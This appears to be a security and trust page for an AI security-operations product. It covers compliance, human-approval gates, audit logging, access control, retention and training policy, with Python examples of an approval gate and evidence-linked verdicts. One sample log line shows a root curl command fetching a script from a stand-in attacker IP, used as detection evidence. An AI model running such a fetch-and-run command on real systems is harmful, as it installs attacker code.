Security · verified

SOC 2 Type II compliant. ISO 27001 in progress.

Compliance posture
  • SOC 2 Type II compliant
    Audit completed January 2026. Scope: SOCPilot SaaS multi-tenant production environment.
  • ISO 27001 — in progress
    Stage 2 audit scheduled August 2026.
  • Penetration test
    Annual test conducted by Kestrel Cyber, November 2025.
Authority boundaries
Read-only · MFA required · Kill switch

What SOCPilot does automatically. What requires a human.

Control 01
Human approval for high-impact actions

SOCPilot automates investigation. Humans authorize impact.

  • Automatic: entity correlation, timeline sequencing, evidence collection, brief generation.
  • Human approval required: escalating to Critical status.
  • Human approval required: updating downstream tickets in Jira / ServiceNow.
  • Human approval required: final case closure.

Control 02
Read-only defaults

Every integration begins read-only.

  • Write scopes require Tenant Admin opt-in per integration.
  • Mode is auditable and reversible.

Control 03
Immutable audit logs

Every Approve / Reject / Edit action recorded.

  • Retained 180 days.
  • Per-actor and per-role attribution.
  • Exportable for auditor review.

Control 04
Least-privilege integrations

Each connector documents and minimizes scope.

  • Per-connector permission manifest.
  • Rotatable, encrypted credentials.
  • One-click revoke at the source system.
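Controls 01 to 04 describe one enforcement point seen from four sides: a gate that lets investigative work run, parks anything with external impact until a named human approves it, refuses writes on a connector that has not been opted in or scoped for them, and records every attempt in a log that cannot be quietly edited. The Python below is an added example written for this page, not SOCPilot's implementation; the action identifiers, the `tickets:write` scope, the set of approver roles and the hash-chained log format are assumptions chosen to mirror the text.

```python
import hashlib
import json
from dataclasses import dataclass, field

# Assumed action identifiers modelled on Control 01 (illustrative, not the product's).
AUTO_ACTIONS = {"correlate_entities", "sequence_timeline",
                "collect_evidence", "generate_brief"}
HIGH_IMPACT_ACTIONS = {"escalate_critical", "update_ticket", "close_case"}
# Actions that write to a source system and the (assumed) scope each needs.
REQUIRED_WRITE_SCOPE = {"update_ticket": "tickets:write"}
# Roles that may Approve / Reject; Executive is read-only (assumption from Control 06).
APPROVER_ROLES = {"Platform Admin", "Tenant Admin", "Security Engineer", "SOC Analyst"}


@dataclass
class Connector:
    """One integration: a documented scope manifest, read-only until opted in."""
    name: str
    manifest: frozenset
    write_enabled: bool = False


@dataclass
class AuditLog:
    """Append-only record; each entry commits to the previous entry's hash."""
    entries: list = field(default_factory=list)

    @staticmethod
    def _digest(body):
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

    def append(self, actor, role, action, outcome, detail=""):
        prev = self.entries[-1]["hash"] if self.entries else "0" * 64
        body = {"actor": actor, "role": role, "action": action,
                "outcome": outcome, "detail": detail, "prev": prev}
        self.entries.append({**body, "hash": self._digest(body)})

    def verify(self):
        """True iff no entry has been altered, reordered or removed."""
        prev = "0" * 64
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            if body["prev"] != prev or self._digest(body) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True


class Gate:
    def __init__(self):
        self.log = AuditLog()
        self.pending = {}   # request id -> (action, connector)

    def set_write_mode(self, connector, enabled, actor, role):
        """Control 02: only a Tenant Admin may change a connector's mode; reversible."""
        ok = role == "Tenant Admin"
        if ok:
            connector.write_enabled = enabled
        self.log.append(actor, role, "set_write_mode", "applied" if ok else "rejected",
                        f"{connector.name} write={enabled}")
        return ok

    def request(self, action, connector=None, actor="socpilot", role="system"):
        """Control 01: automatic work runs; high-impact work is parked for a human."""
        if action in AUTO_ACTIONS:
            self.log.append(actor, role, action, "executed")
            return "executed"
        if action in HIGH_IMPACT_ACTIONS:
            rid = f"req-{len(self.log.entries) + 1}"
            self.pending[rid] = (action, connector)
            self.log.append(actor, role, action, "pending", rid)
            return rid
        self.log.append(actor, role, action, "rejected", "not an allowed action")
        return None

    def decide(self, rid, approve, actor, role):
        """Record a human Approve/Reject after checking role and connector mode."""
        if rid not in self.pending or role not in APPROVER_ROLES:
            self.log.append(actor, role, "decide", "rejected", rid)
            return "rejected"
        action, connector = self.pending[rid]
        scope = REQUIRED_WRITE_SCOPE.get(action)
        if approve and scope and not (connector and connector.write_enabled
                                      and scope in connector.manifest):
            # Controls 02/04: the write stays pending until the connector is
            # opted in and its manifest grants the scope; the attempt is logged.
            self.log.append(actor, role, action, "blocked", f"{rid} needs {scope}")
            return "blocked"
        del self.pending[rid]
        outcome = "approved" if approve else "rejected"
        self.log.append(actor, role, action, outcome, rid)
        return outcome


if __name__ == "__main__":
    gate = Gate()
    jira = Connector("jira", frozenset({"tickets:read", "tickets:write"}))
    rid = gate.request("update_ticket", jira)
    print(gate.decide(rid, True, "ana", "SOC Analyst"))   # blocked: connector read-only
    gate.set_write_mode(jira, True, "tim", "Tenant Admin")
    print(gate.decide(rid, True, "ana", "SOC Analyst"), gate.log.verify())
```

Two details matter in practice. A blocked write is not dropped: it stays pending so the same request can be approved once the Tenant Admin has flipped the connector, and both the blocked attempt and the later approval appear in the log with actor and role. And because each entry commits to its predecessor, editing or deleting an earlier entry makes `verify()` fail; in a real deployment the chain head would be anchored somewhere the application cannot write to, which is what turns "append-only" into "immutable".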

Control 05
Evidence-linked reasoning

Every recommendation cites the log line it relied on.

  • No black-box verdicts.
  • Per-signal confidence weights.
  • AI outputs are drafts until a human approves.
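Control 05 states a property that can be checked mechanically: a recommendation is only as good as the evidence it points at, so a verdict whose citations no longer resolve should not survive. The Python below is an added example written for this page, not SOCPilot's code; the log lines are constructed, the signal names and weights are invented, and the noisy-OR rule for combining per-signal confidences is an assumption. Citations are content-addressed, so altering or dropping a cited line breaks the citation rather than silently leaving the verdict intact.

```python
import hashlib
from dataclasses import dataclass

# Constructed sample log lines for the example (not real telemetry).
EVIDENCE = [
    "2026-01-14T09:12:03Z host1 sshd[4121]: Failed password for root from 203.0.113.7 port 51022",
    "2026-01-14T09:12:05Z host1 sshd[4121]: Failed password for root from 203.0.113.7 port 51023",
    "2026-01-14T09:12:09Z host1 sshd[4121]: Accepted password for root from 203.0.113.7 port 51031",
    "2026-01-14T09:13:41Z host1 sudo: root : COMMAND=/usr/bin/curl -s http://203.0.113.7/x.sh",
]


def line_ref(line):
    """Content-addressed reference to one log line (first 16 hex of SHA-256),
    so a citation stops resolving if the cited line is altered or dropped."""
    return hashlib.sha256(line.encode()).hexdigest()[:16]


@dataclass(frozen=True)
class Signal:
    name: str
    weight: float   # per-signal confidence in [0, 1]
    cites: tuple    # line_ref() values the signal relied on


@dataclass
class Recommendation:
    action: str
    signals: tuple
    status: str = "draft"   # an AI output stays a draft until a human approves


def unresolved_citations(rec, evidence):
    """Cited refs that do not resolve to a line in the evidence set.
    Non-empty means the recommendation is not fully evidence-linked."""
    known = {line_ref(line) for line in evidence}
    return [ref for s in rec.signals for ref in s.cites if ref not in known]


def combined_confidence(rec):
    """Noisy-OR of independent signals (assumed rule): 1 - prod(1 - w_i).
    A signal with no citations is a black-box hunch and contributes nothing."""
    miss = 1.0
    for s in rec.signals:
        if s.cites:
            miss *= 1.0 - s.weight
    return round(1.0 - miss, 3)


def explain(rec, evidence):
    """Signal name -> the verbatim log lines it cites, for the analyst's brief."""
    by_ref = {line_ref(line): line for line in evidence}
    return {s.name: [by_ref[r] for r in s.cites if r in by_ref] for s in rec.signals}


def build_recommendation(evidence):
    """Example verdict assembled from the sample lines above."""
    refs = [line_ref(line) for line in evidence]
    return Recommendation(
        action="Escalate: probable credential brute force followed by payload download",
        signals=(
            Signal("repeated_auth_failures", 0.4, (refs[0], refs[1])),
            Signal("success_after_failures_same_source", 0.5, (refs[2],)),
            Signal("outbound_fetch_to_attacker_ip", 0.6, (refs[3],)),
        ),
    )


if __name__ == "__main__":
    rec = build_recommendation(EVIDENCE)
    print("unresolved:", unresolved_citations(rec, EVIDENCE))
    print("confidence:", combined_confidence(rec), "status:", rec.status)
    for name, lines in explain(rec, EVIDENCE).items():
        print(name, "->", lines)
```

The check worth running before a brief reaches an analyst is `unresolved_citations(...) == []`; if raw telemetry has aged out under the 30-day window while the narrative is still within its 90 days, that check is also how the narrative learns its evidence is gone.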

Control 06
Role-based access control

Five roles, enforced at the database.

  • Platform Admin, Tenant Admin, Security Engineer.
  • SOC Analyst (Read / Edit).
  • Executive (Read-only).
  • SAML 2.0 and OIDC supported.
  • MFA mandatory for Admin and Engineer roles.

Cryptography & infrastructure

Verified controls.

  • TLS 1.3 in transit.
  • AES-256 at rest via AWS KMS.
  • Data residency: US-East-1 by default; EU-Central-1 for EMEA.
  • Subprocessors: AWS, Pinecone, Anthropic (private API).

Data retention

Windows are explicit and enforced.

  • Raw telemetry: 30 days.
  • Investigation narratives: 90 days.
  • Executive briefs & compliance packs: 365 days.
  • Deletion: automated hard delete at retention expiry; manual purge available via API.

AI / model policy

Contextual enrichment only, unless a Tenant Admin opts in.

By default, customer telemetry is used only for contextual enrichment and is not used to train the underlying LLM/ML models. Training use is opt-in: it requires the Tenant Admin to enable Global Intelligence.

Trust Center

Need our SOC 2 Type II report, DPA, or pen-test summary?

The SOC 2 Type II report, DPA, pen-test summary and subprocessor list are available under NDA. Same-business-day response on security requests.

Or report a vulnerability: we run a coordinated disclosure program. To report one, email security@socpilot.co with details.